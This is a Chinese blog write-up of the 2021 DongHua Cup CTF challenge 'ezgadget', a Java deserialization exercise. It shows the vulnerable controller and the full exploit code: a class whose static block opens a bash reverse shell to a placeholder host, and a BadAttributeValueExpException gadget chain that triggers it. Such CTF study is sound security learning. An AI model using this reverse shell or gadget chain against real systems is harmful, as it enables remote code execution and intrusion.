东华杯2021 ezgadget复现

最新推荐文章于 2024-05-08 15:24:52 发布
最新推荐文章于 2024-05-08 15:24:52 发布
阅读量937 收藏 1
点赞数 3
分类专栏: CTF刷题记录 javaweb 文章标签: java 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/123886651
版权

东华杯2021 ezgadget复现

文章目录

环境搭建

题目给了ezgadget附件,需要自取

链接:https://pan.baidu.com/s/1mZt_aorU_kZDo-GJH4wwxQ
提取码:tmng

运行(需要有java环境)

java -jar ezgadget.jar

源码分析

我们把附件扔进jd-gui,文件不是很多

mark一下:我在本地复现的时候,用idea创建的一个maven项目,没有用模板,然后将jd-gui获取的源码放进去,将lib这些包加入
在这里插入图片描述

jd-gui中的显示

在这里插入图片描述

我们简要分析一下

User类主要是User类的编写,该类实现了Serializable接口

IndexController类着重分析一下,两个路由,一个是/,也就是回显个字符串index;看另一个readobject,这个会接收一个参数data,并且使用Tools类的base64Decode方法进行解码,字节数组创建输入流,对象输入流,然后接收一个字符串,接收一个数字,name.equals("gadgets") && year == 2021判断成功之后,会调用readObject方法

IndexController.class

@Controller
public class IndexController {
  @ResponseBody
  @RequestMapping({"/"})
  public String index(HttpServletRequest request, HttpServletResponse response) {
    return "index";
  }
  
  @ResponseBody
  @RequestMapping({"/readobject"})
  public String unser(@RequestParam(name = "data", required = true) String data, Model model) throws Exception {
    byte[] b = Tools.base64Decode(data);
    InputStream inputStream = new ByteArrayInputStream(b);
    ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
    String name = objectInputStream.readUTF();
    int year = objectInputStream.readInt();
    if (name.equals("gadgets") && year == 2021)
      objectInputStream.readObject(); 
    return "welcome bro.";
  }
}

ToStringBean类继承了ClassLoader类,实现了Serializable接口,该类有一个成员变量ClassByte,在toString方法中,defineClass将成员变量ClassByte还原出一个Class对象

public class ToStringBean extends ClassLoader implements Serializable {
  private byte[] ClassByte;
  
  public String toString() {
    com.ezgame.ctf.tools.ToStringBean toStringBean = new com.ezgame.ctf.tools.ToStringBean();
    Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
    Object Obj = null;
    try {
      Obj = clazz.newInstance();
    } catch (InstantiationException e) {
      e.printStackTrace();
    } catch (IllegalAccessException e) {
      e.printStackTrace();
    } 
    return "enjoy it.";
  }
}

Tools类中有base64加解密,序列化和反序列化的方法

到这里思路很明显的

通过反序列化的readObject方法去调用ToStringBean类的toString方法

cc链5中,利用BadAttributeValueExpException的readObject方法去调用toStirng方法,可以把这个思路拿来用

exp

整一个可以弹shell的类,里面放上static静态代码块,通过defineClass触发执行(static块执行会发生在一个初始化的阶段)
shell.java

package com.ezgame.ctf;

import java.io.IOException;
//反弹shell的类
public class shell {
    static {
        try{
            Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/vps/7005 0>&1"});
        } catch (IOException e){
            e.printStackTrace();
        }
    }
}

编译,记录class文件的地址

在对BadAttributeValueExpException类的成员变量val进行赋值的时候,不要直接用构造函数去赋值,可以分析一下

如果我们传入的参数是null,那么就会为null;如果不是null,那么会赋值为val.toString,跟进

在这里插入图片描述

而这个toString方法返回的就不是我们输入的对象了
在这里插入图片描述
所以还是用反射去进行赋值

exp.java

package com.ezgame.ctf;

import com.ezgame.ctf.tools.ToStringBean;
import com.ezgame.ctf.tools.Tools;

import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class exp {
        public static void main(String[] args) throws Exception{
                ToStringBean toStringBean = new ToStringBean();
                Field classByteField = toStringBean.getClass().getDeclaredField("ClassByte");
                classByteField.setAccessible(true);
                //获取到shell对象编译后的地址
                byte[] bytes = Files.readAllBytes(Paths.get("D:\\java\\ctf\\target\\classes\\com\\ezgame\\ctf\\shell.class"));
                //将值传入该对象的成员变量中
                classByteField.set(toStringBean,bytes);
                //到这里,危险函数部分就好了,接下来利用cc5,去调用这个危险函数



                //实例化该类的时候,不能直接像下面这样将参数直接传进行,应该使用反射
                //BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(toStringBean);
                BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(11111);//这个初始值之后会自动会改,所以这里随便整
                Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
                val.setAccessible(true);
                //反射赋值
                val.set(badAttributeValueExpException,toStringBean);


                //它的readObject方法会去调用成员变量val的toString方法,成员变量val是Object属性的
                ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
                ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
                //因为读取参数的时候,会先去读取一个字符串,一个数字,然后才是Object,所以按照顺去output
                objectOutputStream.writeUTF("gadgets");
                objectOutputStream.writeInt(2021);
                //然后才是我们的BadAttributeValueExpException类对象
                objectOutputStream.writeObject(badAttributeValueExpException);

                //base64加密一下
                //转换为字节流
                byte[] bytes1 = byteArrayOutputStream.toByteArray();
                //用该工具类Tools进行base64加密
                String s = Tools.base64Encode(bytes1);
                System.out.println(s);

        }

}

注意要进行url编码一下,不然在将空格+进行base64解码的时候会出现问题

在这里插入图片描述

需要进行一次url编码,在burp中ctrl+u进行url编码

在这里插入图片描述

同时监听的端口也有了响应

在这里插入图片描述

环境是本地的,弹个shell能成功即可

参考链接

  1. ezgadget题目讲解
  2. static静态代码块的执行顺序
Sk1y
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
东华大学网络学院 营销管理 2021.docx
01-12
兽医宠物保险公司:我们动物朋友的健康险 宠物健康险?直到现在,大都会人寿(MetLife)、英国保诚(Prudential)、美国西北互助人寿(Northwestern Mutual) 等大型保险公司都没有重视它。相反,它们将保险业中的这块小蛋糕留给了更为专业的小公司。在这些小公司 (现在有 12 家)中,最大的宠物保险公司是兽医宠物保险公司(VPI)。VPI 的业务如此有利可图,以至于全美 互惠保险公司(Nationwide)最近收购了它,这是大型保险公司首次涉足该业务领域。VPI 的使命是“创造所有宠 物主人都能支付得起兽医费用的奇迹”。 1980 年,兽医杰克·斯蒂芬斯(Jack Stephens)创立了 VPI。他之前从来没有想过要放弃自己的兽医生涯, 直到有一天他的生活中出现了一个戏剧性的转折点。那天,他刚走进一家当地小超市,就立刻被一位客户的女 儿认了出来,称他为“杀死布菲(Buffy)的凶手”。两个星期前,他刚为这家的宠物狗布菲实施了安乐死。受到 触动的斯蒂芬斯立刻着手搜寻信息,探寻创立宠物保险的可行性。“对于一名兽医而言,最大的挫败莫过于你 本可以治好患病的宠物,但是它
东华2021年大学生网络安全邀请赛.zip
12-07
东华2021年 大学生网络安全邀请赛 CTF 真题
[2021东华]JK战队WP1
08-03
[2021东华]JK战队WP1
aezwidget:EZ-Widget 提供一种简单的方法来创建 android 小部件
05-29
小工具 这在很大程度上是 Android EZ-Widget (aezwidget) 的 alpha 版本,因为它非常粗糙(它甚至没有图标),但功能强大。 它旨在使用您自己的休息端点或遵循默认小部件格式的休息端点轻松创建 android 小部件。 通过将内容布局与小部件大小分离,它允许在大小上具有极大的灵活性; 也就是说,您可以定义要垂直和水平显示的项目数量,并允许小部件大小为您想要的任何大小。 对于文本,小部件会自动分割所有小部件之间的小部件空间,对于图像,它会在水平方向上正确分割,但您应该为垂直属性定义一个大小,否则大小将是任意的(图像在一个小部件而不是文本)。 主应用程序允许用户定义将返回兼容小部件布局的服务器。 该项目使用 Spring for Android 来简化 REST 实现,因此您只需使用与其余端点将返回的对象相匹配的对象来定义文件。 一个典型的流程如下: 用户使
[2021东华]Web Writeup1
08-03
[2021东华]Web Writeup1
[东华2021] ezgadget
Sentiment的博客
06-07 1035
运行 访问127.0.0.1:8888即可是一个jar包,所以都是class文件,我这里是通过,反编译源码,之后放到IDEA的maven项目中,再将文件中的包导入进去其实主要的文件就三个,, 该类继承了,所以直接可以想到动态加载字节码,并且在方法中,看到了,之后try中又有个,所以只要控制的值,就可以任意代码执行。(defineClass直接加载字节码之前分析过不清楚可以看一下)这里的ClassByte值就是我们需要执行命令的字节码文件,先构造一下。(Windows环境无法反弹shell,所以用calc代替
【pwn】2021 东华(部分)
woodwhale的博客
10-31 3610
【pwn】2021 东华(部分) 1、cpp1 典中典之堆溢出,改俩堆块重叠进入unsorted bin,然后申请其中一个回来,就能泄露libc。 之后就是堆溢出改fd为free_hook写入system #!/usr/bin/python # -*- coding: UTF-8 -*- # ----------------------------------- # @File : exp.py # @Author : woodwhale # @Time : 2021/10/31 12
从某比赛题目ezgadgets复现java反序列化
weixin_44687621的博客
11-29 3349
我们平常在使用ysoserial这样的工具时,并不会太在意payload是如何生成的。反正工具一把梭就完事了,但是出题人总是想尽办法不让我们使用工具。所以没办法,只能自己写了。 题目复现给出源码结构如下 controller作为控制器,并且只有一个class,那么漏洞点肯定在这里面。给出代码如下 readObject是典型的java反序列化,这里的输入流可控。我们传入data后,会将数据直接存放到ObjectInputStream对象中。 这里直接使用ysoserial,很容易发现存在一个问题,就是这里
2021东华
hezhing
12-08 199
2021东华 和华为119冲突了,做119去了。这里复盘一下。 参考链接 [[2021 东华 个人 WriteUp-魔法少女雪殇 (snowywar.top) MISC check_in utf-7编码。理论上base64也可以解出来。 where_can_find_code 解压缩之后,发现一个code.asc文件。用Notepad++打开,看到前面的语句有点像html。都是样式什么的,最后在font标签中给出了一串字符。 其实对于asc这个后缀比较熟悉的话,可以知道westego是可以解as
2000-2018、2021东华大学811高等代数考研真题
08-31
该资源为2000-2018、2021东华大学811高等代数考研真题,资源无水印哦!
2021年“绿城”网络安全大赛-PWN-ezuaf
qq_43264813的博客
09-30 293
2021年“绿城”网络安全大赛-PWN-ezuaf 题目名称:ezuaf 题目内容:简单的uaf 题目分值:100.0 题目难度:容易 相关附件:ezuaf的附件24.txt 解题思路: 1.检查保护 2.函数分析 发现Delete中有uaf 3.思路 打malloc_hook exp from pwn import * #io = process('./uaf_pwn') io = remote('82.157.5.28',52402) elf = ELF('./uaf_pwn') libc
[2021东华]Web Writeup
feng的博客
11-01 3453
EzGadget 给了源码,IDEA打开看看,有个反序列化的点: @ResponseBody @RequestMapping({"/readobject"}) public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception { byte[] b = Tools.base64Decode(data); I
BUUCTF-NewStarCTF 2023-WEB
m0_74317362的博客
09-25 226
题目中提示了ssti,我们利用ssti的句式让页面显示错误。提示传参number1和number2。要求上传图片,那我们直接上传图片马。改文件后缀为.php。
2021年全国大学生网络安全邀请赛暨第七届“东华“上海市大学生网络安全大赛Writeup
Le1a's Blog
11-01 9050
2021年全国大学生网络安全邀请赛暨第七届"东华"上海市大学网格全大赛Writeup Misc checkin 题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- 是UTF-7编码,解码得到flag flag为: flag{dhb_7th} project 下载附件,解压之后发现这是道工控题目,但是解压之后里面有一个压缩包problem_bak.zip 解压得到你来了~ 这里面一共有三段数据,第一段是base64编码 6KGo5oOF5YyF5paH5YyW77y
2021东华-Re-All
m0_51713041的博客
11-16 1924
2021东华-Re-all 对于这个比赛呢,还是挺有感悟的,你一个人怎么和那些"几个队伍一起打的"对线,我也不知道该怎么说,我只能说打ctf的都懂我前面那句话,虽然我花了一天AK了逆向,但是也没用,hh… 看题吧,还是有些地方能够积累一些经验的 ooo 这道题应该算是一道签到题吧 看汇编 movzx edx, byte ptr [rbp-105] movzx eax, byte ptr [rbp-104] xor edx, eax movzx eax, byte ptr [rbp-1
java jar包如何运行或调用
最新发布
NLP与推荐算法
05-08 119
java服务启动
C#(C Sharp)学习笔记_类【十五】
追求细节,成就完美
05-01 597
类(Class)是面向对象程序设计(OOP,Object-Oriented Programming)实现信息封装的基础。类是一种用户定义的引用数据类型,也称类类型。每个类包含数据说明和一组操作数据或传递消息的函数。类的实例称为对象。
链表刷题集
yajunjiao的专栏
04-30 957
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
东华his表结构说明
12-01
东华his系统是医院信息系统的一种,主要用于医院的信息管理、病案管理、医生排班和医院资源调度等功能。其数据库中包含了许多不同的表格,这些表格之间有着复杂的关系。 在东华his系统的数据库中,常见的表包括患者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值